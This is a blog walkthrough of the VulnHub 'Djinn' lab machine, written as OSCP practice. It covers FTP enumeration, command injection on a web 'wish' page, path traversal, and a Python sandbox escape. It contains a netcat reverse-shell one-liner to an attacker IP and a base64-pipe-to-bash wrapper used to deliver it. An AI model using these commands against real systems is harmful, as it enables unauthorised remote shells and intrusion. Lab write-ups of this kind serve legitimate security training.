Open in app

Sign in

Write

Sign in

Djinn machine— Walkthrough

Cursemagic
4 min readDec 23, 2023

--

Hi guys, this is the sixth day and sixth box (6D-6B for my personal reference). I will be trying to complete at least one box per day (if could two or more) so I could gain my confidence, learn new knowledge, and prepare for OSCP.

Wish me luck!

So, today I would like to work on Djinn machine, which is from VulnHub. Let’s get started!

################################################################ — — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
###############################################################

Enumeration

Nmap

FTP

We can login to the ftp server and download the files. It is good to see we do not need a user’s password.

creds.txt

We will see a credentials in the file.

game.txt

Looks like we will have a port on 1337 and there will be a game.

message.txt

We might have another username? But we can confirm it will be a mess.

Port 7331

Now, we can see there is nothing special on the http page.

gobuster

We got wish and a genie. (Wish my dream come true)

/wish

when i tried to enter ‘whoami’, it shows error. But, the url still reflects the whoami command. Maybe we still have some hope with our wish.

But when using “../../../../../etc/passwd”, it shows a different output.

After trying for a moment, I finally get a reverse shell from the cmd prompt.

Original: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <Attacker_IP> 4444 >/tmp/f

Base64 encoded: echo <The_Encoded_Original>| base64 -d |bash

Searching, and wandering around…

The app.py shows this:

And we can checks the location of the creds.txt, we can find a new credentials.

So, to switch user to nitish, we can use the command su nitish. But, we will need to upgrade the shell.

I am Nitish

On Nitsh user directory, we can find user.txt flag.

Now, I try to check the user’s permission. We can see that there is /usr/bin/genie that we might able to use.

So, we could try to ask genie for help?

Let’s try some…

It just added and nothing had changed. Also, I had tried to look for other method but it still failed.

Maybe we should try the math game on port 1337?

Port 1337

Well, you are partially right.

Finding on Google for a while and I find this.

Link: https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes

I tried one of it here.

After multiple tries, finally I get the reverse connection.

The bash, is to ensures that the command is interpreted by the Bash shell. Without it, the command would be executed by the default shell of the system, which may or may not be Bash.

Then, we have the final proof.

Voila! Another room done!

Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.

Twitter: https://twitter.com/curse_jk

Buy me coffee:http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com

Djinn
Vulnhub
Walkthrough

--

--

Cursemagic
Cursemagic

Written by Cursemagic

15 Followers
1 Following

Just learning, together we are strong.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams